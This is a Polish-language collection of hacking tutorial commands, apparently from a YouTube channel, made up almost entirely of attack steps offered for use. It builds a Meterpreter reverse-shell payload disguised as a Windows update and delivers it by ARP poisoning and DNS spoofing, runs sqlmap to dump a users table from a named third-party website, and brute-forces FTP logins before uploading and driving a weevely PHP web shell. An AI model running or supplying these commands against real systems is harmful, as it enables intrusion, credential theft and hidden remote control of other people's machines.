Komendy:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 x > /root/var/www/Windows-KB183905-x86-x64-PL.exe
kwrite /usr/share/ettercap/etter.dns
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
set LPORT 4444
exploit
jak ktos by chcial index.php i ikonke pw na forum :D
GAME OVER
Automatyczny atak sql injection przy urzyciu sqlmap
Komendy:
cd /pentest/web/scanners/sqlmap
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 --dbs
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -D pjirc_forum --tables
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users --columns
python sqlmap.py -u http://www.pjirc.com/admin/file.php?id=146 -T users -U test --dump
i logujemy sie ;)
p.s
1. Backtrack 5 R1 - sqlmap
cd /pentest/database/sqlmap
video nie moje mam nadzieje ze autor sie nie obrazi a nawet jak sie obrazi to zrobimy nowe zapraszam na youtube channel: ruo911 pozdro
Komendy:
ifconfig
nmap 192.168.2.*
msfconsole
use auxiliary/scanner/ftp/ftp_login
set USER_FILE Desktop/loginy.lst
set PASS_FILE Desktop/password.lst
set RHOSTS 192.168.2.100
set STOP_ON_SUCCESS true
run
cd /pentest/backdoors/web/weevely
./weevely.py generate 5m4ru /root/Desktop/backdors.php
wysylamy backdora na ftp (w moim przypadku filezilla)
./weevely.py http://192.168.2.100/backdors.php 5m4ru (podajemy scierzke url gdzie znajduje sie nasza furtak powodzenia ! )
GAME OVER